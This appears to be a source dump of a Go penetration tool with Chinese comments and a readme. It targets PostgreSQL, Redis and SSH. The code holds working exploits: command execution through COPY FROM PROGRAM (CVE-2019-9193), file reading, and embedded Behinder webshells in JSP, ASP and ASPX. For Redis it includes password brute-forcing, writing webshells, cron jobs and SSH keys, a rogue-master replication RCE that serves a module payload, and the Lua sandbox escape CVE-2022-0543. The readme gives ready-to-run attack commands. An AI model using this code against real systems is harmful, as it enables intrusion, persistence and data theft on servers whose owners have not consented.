EXISTS cmd_exec;", conn) 14 | if err != nil { 15 | Err(err) 16 | } 17 | 18 | Info("创建保存命令输出的表") 19 | _, err = postgrecmd("CREATE TABLE cmd_exec(cmd_output text);", conn) 20 | if err != nil { 21 | Err(err) 22 | } 23 | 24 | Info("执行系统命令") 25 | // _, err = postgrecmd("COPY cmd_exec FROM PROGRAM 'id';", conn) 26 | _, err = postgrecmd(fmt.Sprintf("COPY cmd_exec FROM PROGRAM '%s';", cmd), conn) 27 | if err != nil { 28 | Err(err) 29 | } 30 | 31 | Info("查看执行结果") 32 | _, err = postgrecmd("SELECT * FROM cmd_exec;", conn) 33 | if err != nil { 34 | Err(err) 35 | } 36 | } 37 | 38 | func cve_2019_9193_console(conn *sql.DB) { 39 | Info("删除用来保存命令输出但是可能存在的表") 40 | _, err := postgrecmd("DROP TABLE IF EXISTS cmd_exec;", conn) 41 | if err != nil { 42 | Err(err) 43 | } 44 | 45 | Info("创建保存命令输出的表") 46 | _, err = postgrecmd("CREATE TABLE cmd_exec(cmd_output text);", conn) 47 | if err != nil { 48 | Err(err) 49 | } 50 | 51 | Info("执行系统命令") 52 | reader := bufio.NewReader(os.Stdin) 53 | for { 54 | // 55 | postsqlcmd := "COPY cmd_exec FROM PROGRAM '" 56 | var cmd string 57 | fmt.Printf("%s:%s> $ ", Rhost, Rport) 58 | cmd, _ = reader.ReadString('\n') 59 | cmd = strings.TrimRight(cmd, "\r\n") 60 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 61 | break 62 | } 63 | aa := fmt.Sprintf("%s%s';", postsqlcmd, cmd) 64 | postsqlcmd = strings.TrimRight(postsqlcmd, "\r\n") 65 | Info(aa) 66 | _, err = postgrecmd(aa, conn) 67 | if err != nil { 68 | Err(err) 69 | } 70 | Info("查看执行结果") 71 | _, err = postgrecmd("SELECT * FROM cmd_exec;", conn) 72 | if err != nil { 73 | Err(err) 74 | } 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /pac/postgre_fileread.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "database/sql" 6 | "fmt" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | func PostgreFileRead(conn *sql.DB, file string) { 12 | table := RandStr(3) 13 | 14 | // 创建表 15 | 
Info("创建表") 16 | _, err := postgrecmd(fmt.Sprintf("CREATE TABLE %s (t TEXT);", table), conn) 17 | if err != nil { 18 | Err(err) 19 | } 20 | 21 | // COPY内容 22 | Info("Copy命令") 23 | _, err = postgrecmd(fmt.Sprintf("COPY %s FROM '%s';", table, file), conn) 24 | if err != nil { 25 | Err(err) 26 | 27 | } 28 | 29 | // 读取内容 30 | Info("读取内容") 31 | _, err = postgrecmd(fmt.Sprintf("SELECT * FROM %s;", table), conn) 32 | if err != nil { 33 | Err(err) 34 | } 35 | 36 | } 37 | 38 | // 循环读取文件 39 | func loopPostgreFileRead(conn *sql.DB) { 40 | Info("输入读取的文件名") 41 | reader := bufio.NewReader(os.Stdin) 42 | for { 43 | fmt.Printf("%s:%s> ", Rhost, Rport) 44 | cmd, _ := reader.ReadString('\n') 45 | cmd = strings.TrimRight(cmd, "\r\n") 46 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 47 | break 48 | } 49 | PostgreFileRead(conn, cmd) 50 | } 51 | } 52 | 53 | // 利用postgresql大对象来处理读文件 54 | func PostgreFileReadhex(conn *sql.DB, file string) { 55 | 56 | key := RandStrnum(3) 57 | Info("请手工把hex转换成string") 58 | 59 | // 创建表 60 | Info("lo_import读取文件") 61 | Info(fmt.Sprintf("select lo_import('%s',%s);", file, key)) 62 | 63 | _, err := postgrecmd(fmt.Sprintf("select lo_import('%s',%s);", file, key), conn) 64 | if err != nil { 65 | Err(err) 66 | } 67 | 68 | // 输出 69 | Info("转换成hex输出") 70 | Info(fmt.Sprintf("select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a;")) 71 | _, err = postgrecmd(fmt.Sprintf("select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=%s order by pageno)a;", key), conn) 72 | if err != nil { 73 | Err(err) 74 | } 75 | } 76 | 77 | // 循环读取文件 78 | func loopPostgreFileReadhex(conn *sql.DB) { 79 | Info("输入读取的文件名") 80 | reader := bufio.NewReader(os.Stdin) 81 | for { 82 | fmt.Printf("%s:%s> ", Rhost, Rport) 83 | cmd, _ := reader.ReadString('\n') 84 | cmd = strings.TrimRight(cmd, "\r\n") 85 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 86 | break 87 | } 88 | 
PostgreFileReadhex(conn, cmd) 89 | } 90 | } 91 | 92 | // 循环列目录 93 | func loopPostgreListDirectoy(conn *sql.DB) { 94 | Info("输入目录") 95 | reader := bufio.NewReader(os.Stdin) 96 | for { 97 | fmt.Printf("%s:%s> ", Rhost, Rport) 98 | cmd, _ := reader.ReadString('\n') 99 | cmd = strings.TrimRight(cmd, "\r\n") 100 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 101 | break 102 | } 103 | postgrecmd(fmt.Sprintf("select pg_ls_dir('%s');", cmd), conn) 104 | } 105 | } 106 | 107 | // 列目录 108 | func PostgreListDirectoy(conn *sql.DB, file string) { 109 | postgrecmd(fmt.Sprintf("select pg_ls_dir('%s');", file), conn) 110 | } 111 | -------------------------------------------------------------------------------- /pac/postgre_write.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | ) 7 | 8 | func WriteFile(conn *sql.DB, uploadPath string, e string) { 9 | table := RandStr(3) 10 | 11 | Info("创建表") 12 | _, err := postgrecmd(fmt.Sprintf("CREATE TABLE %s (t TEXT);", table), conn) 13 | if err != nil { 14 | Err(err) 15 | } 16 | 17 | if e == "jsp" { 18 | Webshell = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>" 19 | } else if e == "php" { 20 | Webshell = "\n" 21 | } else if e == "asp" { 22 | Webshell = "<%\nResponse.CharSet = \"UTF-8\" \nk=\"e45e329feb5d925b\" 
'该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond\nSession(\"k\")=k\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFor i=1 To size\nresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))\nNext\nexecute(result)\n%>" 23 | } else if e == "aspx" { 24 | Webshell = "<%@ Page Language=\"C#\" %><%@Import Namespace=\"System.Reflection\"%><%Session.Add(\"k\",\"e45e329feb5d925b\"); /*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/byte[] k = Encoding.Default.GetBytes(Session[0] + \"\"),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"U\").Equals(this);%>\n" 25 | } 26 | 27 | Info("往表中插入Webshell") 28 | _, err = postgrecmd(fmt.Sprintf("INSERT INTO %s(t) VALUES ('%s');", table, Webshell), conn) 29 | if err != nil { 30 | Err(err) 31 | } 32 | 33 | Info("将webshell导出,冰蝎默认的webshell") 34 | _, err = postgrecmd(fmt.Sprintf("COPY %s(t) TO '%s';", table, uploadPath), conn) 35 | if err != nil { 36 | Err(err) 37 | } 38 | 39 | } 40 | -------------------------------------------------------------------------------- /pac/redis_cmd.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "context" 6 | "fmt" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | // RedisCmd 执行 Redis 命令 12 | func RedisCmd(cmd string) interface{} { 13 | 14 | ctx := context.Background() 15 | 16 | var argsInterface []interface{} 17 | 18 | // 处理输入字符串有空格的问题 19 | if strings.Contains(cmd, "\"") { 20 | oldString := ReString(cmd, "\"(.*?)\"") 21 | newString := strings.ReplaceAll(oldString, " ", "$") 22 | cmd = strings.ReplaceAll(cmd, oldString, newString) 23 | cmd = strings.ReplaceAll(cmd, "\"", "") 24 | } 25 | 26 | args := strings.Fields(cmd) 27 | for _, arg := range args { 28 | if strings.Contains(arg, "$") { 29 | arg = strings.ReplaceAll(arg, "$", " ") 30 | } 31 | argsInterface = append(argsInterface, arg) 32 | } 33 | 
34 | info, err := Rdb.Do(ctx, argsInterface...).Result() 35 | if err != nil { 36 | Err(err) 37 | return "" 38 | } 39 | return info 40 | } 41 | 42 | // 获取 Redis 基本信息 43 | func redisVersion() bool { 44 | info := RedisCmd("info") 45 | if strings.Contains(info.(string), "redis_version") { 46 | Info("获取 Redis 基本信息") 47 | os := ReString(info, "os:.*") 48 | version := ReString(info, "redis_version:.*") 49 | Success(os) 50 | Success(version) 51 | dir := RedisCmd("config get dir") 52 | redisDir = redisString(dir)[4:] 53 | Success(redisDir) 54 | 55 | file := RedisCmd("config get dbfilename") 56 | redisDbFilename = redisString(file)[11:] 57 | Success(redisDbFilename) 58 | return true 59 | } 60 | return false 61 | } 62 | 63 | // 循环执行shell命令 64 | func loopCmd(s string) { 65 | Info("执行命令") 66 | reader := bufio.NewReader(os.Stdin) 67 | for { 68 | fmt.Print("$ ") 69 | cmd, _ := reader.ReadString('\n') 70 | cmd = strings.TrimRight(cmd, "\r\n") 71 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 72 | if strings.Contains(s, "exec") { 73 | CloseSlave("exec") 74 | } 75 | break 76 | } 77 | // 执行命令 78 | if strings.Contains(s, "exec") { 79 | RunCmd(cmd) 80 | } else if strings.Contains(s, "lua") { 81 | RedisLua(cmd) 82 | } 83 | 84 | } 85 | } 86 | 87 | // 循环执行 Redis 命令 88 | func loopRedis() { 89 | Info("执行 Redis 命令") 90 | reader := bufio.NewReader(os.Stdin) 91 | for { 92 | fmt.Printf("%s:%s> ", Rhost, Rport) 93 | cmd, _ := reader.ReadString('\n') 94 | cmd = strings.TrimRight(cmd, "\r\n") 95 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 96 | break 97 | } 98 | // 执行命令 99 | fmt.Println(RedisCmd(cmd)) 100 | } 101 | } 102 | -------------------------------------------------------------------------------- /pac/redis_connect.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/go-redis/redis/v8" 7 | "os" 8 | "strings" 9 | "sync" 10 | "time" 11 | ) 12 | 13 | var ( 14 | Rdb *redis.Client 
15 | redisDir string 16 | redisDbFilename string 17 | ) 18 | 19 | // RedisClient 连接 Redis 20 | func RedisClient(pwd string) (err error) { 21 | 22 | Rdb = redis.NewClient(&redis.Options{ 23 | Addr: fmt.Sprintf("%s:%s", Rhost, Rport), 24 | Password: pwd, // 密码认证 25 | }) 26 | 27 | ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) 28 | 29 | defer cancel() 30 | 31 | pong, err := Rdb.Ping(ctx).Result() 32 | if err != nil { 33 | return err 34 | } 35 | if strings.Contains(pong, "PONG") { 36 | redisVersion() 37 | } 38 | return nil 39 | } 40 | 41 | var wg sync.WaitGroup 42 | 43 | // 爆破密码 44 | func ReddisCrack() { 45 | ch := make(chan struct{}, 1) 46 | for _, value := range Passwords { 47 | wg.Add(1) 48 | ch <- struct{}{} 49 | go func() { 50 | defer wg.Done() 51 | err := RedisClient(value) 52 | if err == nil { 53 | Success("成功爆破到 Redis 密码:" + value) 54 | os.Exit(0) 55 | } else if strings.Contains(err.Error(), "ERR Client sent AUTH, but no password is set") { 56 | Success("存在未授权 Redis , 不需要输入密码") 57 | os.Exit(0) 58 | } else { 59 | Err(err) 60 | } 61 | <-ch 62 | }() 63 | } 64 | wg.Wait() 65 | Info("未发现 Redis 密码") 66 | } 67 | -------------------------------------------------------------------------------- /pac/redis_export.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "context" 5 | "encoding/json" 6 | "github.com/go-redis/redis/v8" 7 | "io/ioutil" 8 | ) 9 | 10 | var ( 11 | ctx = context.Background() 12 | FileName = "out.json" 13 | ) 14 | 15 | type String struct { 16 | Key string `json:"key"` 17 | Val string `json:"val"` 18 | } 19 | type HashData struct { 20 | Field string `json:"field"` 21 | Val string `json:"val"` 22 | } 23 | type Hash struct { 24 | Key string `json:"key"` 25 | Data []HashData `json:"data"` 26 | } 27 | type ZsetData struct { 28 | Member string `json:"member"` 29 | Score float64 `json:"score"` 30 | } 31 | type Zset struct { 32 | Key string `json:"key"` 33 | Data 
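// handle_export writes a JSON snapshot of keys from the connected Redis
// instance to FileName.
//
// Only the first SCAN page (MATCH "*", COUNT 100) is processed; the cursor
// returned by that call is not followed. For every key the type is looked up
// and the value is appended to the matching slice of RedisInfo. Errors from
// the per-key reads are ignored and leave that entry's value empty. For a
// list only the head element is recorded, because List.Data is a single
// string.
//
// The export is read-only: the list head is fetched with LINDEX. The earlier
// LPOP call removed that element from the server on every export.
//
// The snapshot holds raw key values, which may include credentials or session
// data, so the file is created with mode 0600. WriteFile applies the mode
// only when it creates the file; an existing out.json keeps its permissions.
func handle_export() {
	redisInfo := RedisInfo{}
	keys, _, err := Rdb.Scan(ctx, 0, "*", 100).Result()
	if err != nil {
		Err(err)
		return
	}

	for _, key := range keys {
		sType, err := Rdb.Type(ctx, key).Result()
		if err != nil {
			Err(err)
			return
		}

		switch sType {
		case "string":
			val, _ := Rdb.Get(ctx, key).Result()
			redisInfo.String = append(redisInfo.String, String{Key: key, Val: val})

		case "list":
			// Non-destructive read of the first element.
			val, _ := Rdb.LIndex(ctx, key, 0).Result()
			redisInfo.List = append(redisInfo.List, List{Key: key, Data: val})

		case "hash":
			val, _ := Rdb.HGetAll(ctx, key).Result()
			hashInfo := Hash{Key: key}
			for k, v := range val {
				hashInfo.Data = append(hashInfo.Data, HashData{Field: k, Val: v})
			}
			redisInfo.Hash = append(redisInfo.Hash, hashInfo)

		case "set":
			val, _ := Rdb.SMembers(ctx, key).Result()
			redisInfo.Set = append(redisInfo.Set, Set{Key: key, Data: val})

		case "zset":
			val, _ := Rdb.ZRevRangeWithScores(ctx, key, 0, -1).Result()
			// Keep a non-nil slice so an empty zset encodes as [] in JSON.
			zs := []ZsetData{}
			for _, z := range val {
				// NOTE(review): this assertion panics if the client ever
				// returns a non-string member.
				zs = append(zs, ZsetData{Member: z.Member.(string), Score: z.Score})
			}
			redisInfo.Zset = append(redisInfo.Zset, Zset{Key: key, Data: zs})
		}
	}

	bs, err := json.Marshal(redisInfo)
	if err != nil {
		Info("序列化成json失败" + err.Error())
		// Nothing valid to write; do not report success.
		return
	}
	if err = ioutil.WriteFile(FileName, bs, 0600); err != nil {
		Info("保存到文件失败" + err.Error())
		return
	}

	Success(FileName + " 导出成功")
}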
186 | } 187 | //list 188 | for _, v := range redis_info.List { 189 | for _, v1 := range v.Data { 190 | Rdb.RPush(ctx, v.Key, v1) 191 | } 192 | } 193 | 194 | Success(FileName + " 导入成功") 195 | 196 | } 197 | -------------------------------------------------------------------------------- /pac/redis_getshell.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "context" 6 | "fmt" 7 | "os" 8 | "strings" 9 | "time" 10 | ) 11 | 12 | func echo(flag, path string) { 13 | var dir, dbfilename, webshell string 14 | var save, helloWebShell = "save", "helloWebShell" 15 | 16 | reader := bufio.NewReader(os.Stdin) 17 | 18 | switch flag { 19 | case "getshell": 20 | fmt.Print("设置保存的路径: ") 21 | dir, _ = reader.ReadString('\n') 22 | dir = strings.TrimSpace(dir) 23 | dir = fmt.Sprintf("config set dir %s", dir) 24 | 25 | fmt.Print("设置保存的文件名:") 26 | fmt.Scanln(&dbfilename) 27 | dbfilename = fmt.Sprintf("config set dbfilename %s", dbfilename) 28 | 29 | Info("读取 " + path) 30 | webshell = fmt.Sprintf("\n\n\n%s\n\n", readExp(path)) 31 | 32 | case "crontab": 33 | dir = "config set dir /var/spool/cron/" 34 | dbfilename = "config set dbfilename root" 35 | Info("读取 " + path) 36 | webshell = fmt.Sprintf("\n\n\n%s\n\n", readExp(path)) 37 | 38 | case "ssh": 39 | fmt.Print("设置Linux用户名: ") 40 | // reader := bufio.NewReader(os.Stdin) 41 | dir, _ = reader.ReadString('\n') 42 | dir = strings.TrimSpace(dir) 43 | 44 | if strings.EqualFold(dir, "root") { 45 | dir = fmt.Sprintf("config set dir /%s/.ssh/", dir) 46 | } else if strings.Contains(dir, "/") { 47 | dir = fmt.Sprintf("config set dir %s", dir) 48 | } else { 49 | dir = fmt.Sprintf("config set dir /home/%s/.ssh/", dir) 50 | } 51 | 52 | dbfilename = "config set dbfilename authorized_keys" 53 | Info("读取 " + path) 54 | webshell = fmt.Sprintf("\n\n%s\n\n", readExp(path)) 55 | } 56 | 57 | Info(dir) 58 | Success(RedisCmd(dir)) 59 | 60 | Info(dbfilename) 61 | 
Success(RedisCmd(dbfilename)) 62 | 63 | Info(webshell) 64 | ctx := context.Background() 65 | err := Rdb.Set(ctx, helloWebShell, webshell, time.Minute*2).Err() 66 | if err != nil { 67 | Err(err) 68 | } 69 | 70 | Info(save) 71 | Success(RedisCmd(save)) 72 | 73 | Info("del " + helloWebShell) 74 | Success(RedisCmd("del " + helloWebShell)) 75 | 76 | dir2 := fmt.Sprintf("config set dir %v", redisDir) 77 | Info(dir2) 78 | Success(RedisCmd(dir2)) 79 | 80 | db := fmt.Sprintf("config set dbfilename %v", redisDbFilename) 81 | Info(db) 82 | Success(RedisCmd(db)) 83 | 84 | Info(save) 85 | Success(RedisCmd(save)) 86 | 87 | } 88 | -------------------------------------------------------------------------------- /pac/redis_lua.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/axgle/mahonia" 7 | ) 8 | 9 | // RedisLua Lua沙盒绕过命令执行 CVE-2022-0543 10 | func RedisLua(cmd string) { 11 | ctx := context.Background() 12 | 13 | val, err := Rdb.Do(ctx, "eval", fmt.Sprintf(`local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("%v", "r"); local res = f:read("*a"); f:close(); return res`, cmd), "0").Result() 14 | if err != nil { 15 | Err(err) 16 | return 17 | } 18 | fmt.Println(mahonia.NewDecoder("gbk").ConvertString(val.(string))) 19 | } 20 | -------------------------------------------------------------------------------- /pac/redis_slave.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/axgle/mahonia" 7 | "io" 8 | "os" 9 | "strings" 10 | ) 11 | 12 | var ( 13 | payload []byte 14 | ) 15 | 16 | // RunCmd system.exec 执行命令 17 | func RunCmd(cmd string) { 18 | ctx := context.Background() 19 | val, err := Rdb.Do(ctx, "system.exec", cmd).Result() 20 | if err != nil { 21 | Err(err) 22 | return 23 | } 24 | 
fmt.Println(mahonia.NewDecoder("gbk").ConvertString(val.(string))) 25 | 26 | } 27 | 28 | // RedisSlave 开启主从复制 29 | func RedisSlave() { 30 | // 打开 exp 31 | f, err := os.Open(dll) 32 | if err != nil { 33 | Err(err) 34 | } 35 | 36 | payload, err = io.ReadAll(f) 37 | if err != nil { 38 | Err(err) 39 | } 40 | 41 | Info("保存数据") 42 | Success(RedisCmd("save")) 43 | 44 | Info("导出数据 out.json") 45 | handle_export() 46 | 47 | Info("开启主从复制") 48 | slave := fmt.Sprintf("slaveof %v 21001", Lhost) 49 | Info(slave) 50 | Success(RedisCmd(slave)) 51 | 52 | dir := fmt.Sprintf("config set dir %v", redisDir) 53 | Info(dir) 54 | Success(RedisCmd(dir)) 55 | 56 | file := fmt.Sprintf("config set dbfilename %v", dll) 57 | Info(file) 58 | Success(RedisCmd(file)) 59 | 60 | Listen() 61 | 62 | load := fmt.Sprintf("module load ./%v", dll) 63 | Info(load) 64 | Success(RedisCmd(load)) 65 | 66 | } 67 | 68 | // CloseSlave 关闭主从复制 69 | func CloseSlave(s string) { 70 | Info("尝试关闭主从") 71 | 72 | Info("slaveof no one") 73 | Success(RedisCmd("slaveof no one")) 74 | 75 | // 执行命令才卸载 module 76 | if strings.Contains(s, "exec") { 77 | // 如果不是 exp.dll 就删除 78 | if !strings.Contains(dll, ".dll") { 79 | RunCmd("rm " + dll) 80 | } 81 | 82 | Info("module unload system") 83 | Success(RedisCmd("module unload system")) 84 | } 85 | 86 | dir := fmt.Sprintf("config set dir %v", redisDir) 87 | Info(dir) 88 | Success(RedisCmd(dir)) 89 | 90 | db := fmt.Sprintf("config set dbfilename %v", redisDbFilename) 91 | Info(db) 92 | Success(RedisCmd(db)) 93 | 94 | Info("导入数据 out.json") 95 | handle_import() 96 | } 97 | -------------------------------------------------------------------------------- /pac/redis_string.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "fmt" 6 | "io" 7 | "io/ioutil" 8 | "os" 9 | "regexp" 10 | "strings" 11 | ) 12 | 13 | var ( 14 | data []string 15 | ) 16 | 17 | // 读取文件 18 | func readFile(file string) { 19 | f, err := 
os.Open(file) 20 | if err != nil { 21 | Err(err) 22 | os.Exit(0) 23 | } 24 | defer f.Close() 25 | 26 | r := bufio.NewReader(f) 27 | for { 28 | var i string 29 | line, err := r.ReadString('\n') 30 | i = strings.Replace(line, "\r\n", "", -1) 31 | if err == io.EOF { 32 | data = append(data, i) 33 | return 34 | } 35 | if err != nil { 36 | fmt.Println(err) 37 | } 38 | data = append(data, i) 39 | } 40 | } 41 | 42 | func readExp(path string) []byte { 43 | shell, err := ioutil.ReadFile(path) 44 | if err != nil { 45 | Err(err) 46 | } 47 | return shell 48 | } 49 | 50 | // 正则匹配 51 | func ReString(info interface{}, s string) string { 52 | reg := regexp.MustCompile(s) 53 | list := reg.FindAllStringSubmatch(info.(string), -1) 54 | return list[0][0] 55 | } 56 | 57 | // Redis 字符串 58 | func redisString(i interface{}) string { 59 | switch v := i.(type) { 60 | case []interface{}: 61 | s := "" 62 | for _, i := range v { 63 | s += i.(string) + " " 64 | } 65 | return s 66 | } 67 | return "" 68 | 69 | } 70 | -------------------------------------------------------------------------------- /pac/redis_tcp.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "fmt" 5 | "io" 6 | "net" 7 | "strings" 8 | "sync" 9 | ) 10 | 11 | // Listen 开启TCP端口 12 | func Listen() { 13 | Info("开启TCP服务") 14 | addr := fmt.Sprintf("0.0.0.0:21001") 15 | Info(addr) 16 | 17 | var wg sync.WaitGroup 18 | wg.Add(1) 19 | 20 | tcpAddr, err := net.ResolveTCPAddr("tcp", addr) 21 | if err != nil { 22 | Err(err) 23 | } 24 | 25 | tcpListen, err := net.ListenTCP("tcp", tcpAddr) 26 | if err != nil { 27 | Err(err) 28 | } 29 | 30 | defer tcpListen.Close() 31 | 32 | c, err := tcpListen.AcceptTCP() 33 | if err != nil { 34 | Err(err) 35 | } 36 | Info(c.RemoteAddr().String()) 37 | 38 | go sendCmd(&wg, c) 39 | wg.Wait() 40 | 41 | c.Close() 42 | 43 | } 44 | 45 | // 读取dll进行主从 46 | func sendCmd(wg *sync.WaitGroup, c *net.TCPConn) { 47 | 48 | defer wg.Done() 49 | 50 | buf 
:= make([]byte, 1024) 51 | for { 52 | n, err := c.Read(buf) 53 | if err == io.EOF { 54 | return 55 | } 56 | 57 | if err != nil { 58 | return 59 | } 60 | 61 | switch { 62 | case strings.Contains(string(buf[:n]), "PING"): 63 | c.Write([]byte("+PONG\r\n")) 64 | 65 | case strings.Contains(string(buf[:n]), "REPLCONF"): 66 | c.Write([]byte("+OK\r\n")) 67 | 68 | case strings.Contains(string(buf[:n]), "SYNC"): 69 | resp := "+FULLRESYNC " + "0000000000000000000000000000000000000000" + " 1" + "\r\n" 70 | resp += "$" + fmt.Sprintf("%v", len(payload)) + "\r\n" 71 | respb := []byte(resp) 72 | respb = append(respb, payload...) 73 | respb = append(respb, []byte("\r\n")...) 74 | c.Write(respb) 75 | } 76 | } 77 | } 78 | -------------------------------------------------------------------------------- /pac/ssh_connect.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "fmt" 5 | "golang.org/x/crypto/ssh" 6 | "golang.org/x/crypto/ssh/terminal" 7 | "io/ioutil" 8 | "log" 9 | "net" 10 | "os" 11 | "time" 12 | ) 13 | 14 | func publicKeyAuthFunc(kPath string) ssh.AuthMethod { 15 | key, err := ioutil.ReadFile(kPath) 16 | if err != nil { 17 | log.Fatal("ssh key file read failed", err) 18 | } 19 | // Create the Signer for this private key. 
20 | signer, err := ssh.ParsePrivateKey(key) 21 | if err != nil { 22 | log.Fatal("ssh key signer failed", err) 23 | } 24 | return ssh.PublicKeys(signer) 25 | } 26 | 27 | func SSHConnect(Ruser string, Rhost string, PWD string) { 28 | //可以使用 password 或者 sshkey 2种方式来认证。 29 | sshHost := Rhost // 主机名 30 | sshUser := Ruser //用户名 31 | sshPassword := PWD //密码 32 | sshType := "password" //ssh认证类型 33 | sshKeyPath := "" //ssh id_rsa.id路径 34 | sshPort := 22 35 | 36 | //创建ssh登陆配置 37 | config := &ssh.ClientConfig{ 38 | Timeout: time.Second, //ssh 连接timeout时间一秒钟,如果ssh验证错误 会在1秒内返回 39 | User: sshUser, //指定ssh连接用户 40 | //HostKeyCallback: ssh.InsecureIgnoreHostKey(), //这个可以,但是不够安全 41 | HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { 42 | return nil 43 | }, 44 | } 45 | 46 | if sshType == "password" { 47 | config.Auth = []ssh.AuthMethod{ssh.Password(sshPassword)} 48 | } else { 49 | config.Auth = []ssh.AuthMethod{publicKeyAuthFunc(sshKeyPath)} 50 | } 51 | 52 | //dial获取ssh Client 53 | addr := fmt.Sprintf("%s:%d", sshHost, sshPort) 54 | sshClient, err := ssh.Dial("tcp", addr, config) 55 | if err != nil { 56 | log.Fatal("创建ssh client 失败", err) 57 | } 58 | defer sshClient.Close() 59 | 60 | //创建ssh-session 61 | session, err := sshClient.NewSession() 62 | if err != nil { 63 | log.Fatal("创建ssh session 失败", err) 64 | } 65 | defer session.Close() 66 | //将当前终端的stdin文件句柄设置给远程给远程终端,这样就可以使用tab键 67 | fd := int(os.Stdin.Fd()) 68 | state, err := terminal.MakeRaw(fd) 69 | if err != nil { 70 | panic(err) 71 | } 72 | defer terminal.Restore(fd, state) 73 | 74 | session.Stdout = os.Stdout // 会话输出关联到系统标准输出设备 75 | session.Stderr = os.Stderr // 会话错误输出关联到系统标准错误输出设备 76 | session.Stdin = os.Stdin // 会话输入关联到系统标准输入设备 77 | 78 | //设置终端模式 79 | modes := ssh.TerminalModes{ 80 | ssh.ECHO: 0, //禁止回显 (0 禁止,1 启动) 81 | ssh.TTY_OP_ISPEED: 14400, // input speed = 14.4kbaud 82 | ssh.TTY_OP_OSPEED: 14400, //output speed = 14.4kbaud 83 | } 84 | 85 | // 请求伪终端 86 | if err = 
session.RequestPty("linux", 32, 160, modes); err != nil { 87 | log.Fatalf("request pty error: %s", err.Error()) 88 | } 89 | 90 | //启动远程shell 91 | if err = session.Shell(); err != nil { 92 | log.Fatalf("start shell error: %s", err.Error()) 93 | } 94 | 95 | //等待远程命令(终端)退出 96 | if err = session.Wait(); err != nil { 97 | log.Fatalf("return error: %s", err.Error()) 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | ## Redis 2 | ### 连接redis获取sql shell 3 | ```shell 4 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -cli 5 | ``` 6 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673162384827-437c4b52-f054-4dac-82fb-2ebd6c5e1db6.png#averageHue=%232d2c2c&clientId=u67188ca8-ad41-4&from=paste&height=227&id=u6a32632c&name=image.png&originHeight=340&originWidth=1748&originalType=binary&ratio=1&rotation=0&showTitle=false&size=61401&status=done&style=none&taskId=u9ce98198-9c8b-40f0-b330-f72a23aee6a&title=&width=1165.3333333333333) 7 | ### 主从复制RCE 8 | ```shell 9 | //Linux 10 | go run .\main.go -redis -rhost 192.168.111.211 -lhost 192.168.1.110 -exec -so exp.so 11 | go run .\main.go -redis -rhost 192.168.111.211 -lhost 192.168.1.110 -exec -console -so exp.so 12 | ``` 13 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673168621037-f35fbab0-d512-4091-84d0-69a8bead823c.png#averageHue=%232c2c2c&clientId=u67188ca8-ad41-4&from=paste&height=593&id=uf2330416&name=image.png&originHeight=890&originWidth=1767&originalType=binary&ratio=1&rotation=0&showTitle=false&size=151041&status=done&style=none&taskId=u8e73d49b-85ea-4c1b-994b-c094dcbd9ea&title=&width=1178) 14 | ### Lua沙盒绕过命令执行(CVE-2022-0543) 15 | ```shell 16 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -lua -console 17 | ``` 18 | 
